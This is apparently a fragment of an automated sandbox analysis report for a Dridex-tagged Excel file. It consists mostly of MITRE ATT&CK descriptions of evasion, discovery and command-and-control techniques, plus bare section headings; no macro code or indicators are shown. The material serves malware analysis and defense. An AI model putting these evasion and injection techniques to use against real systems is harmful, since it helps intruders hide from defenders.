Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Inv0209966048-20210111075675.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Inv0209966048-20210111075675.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1639

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre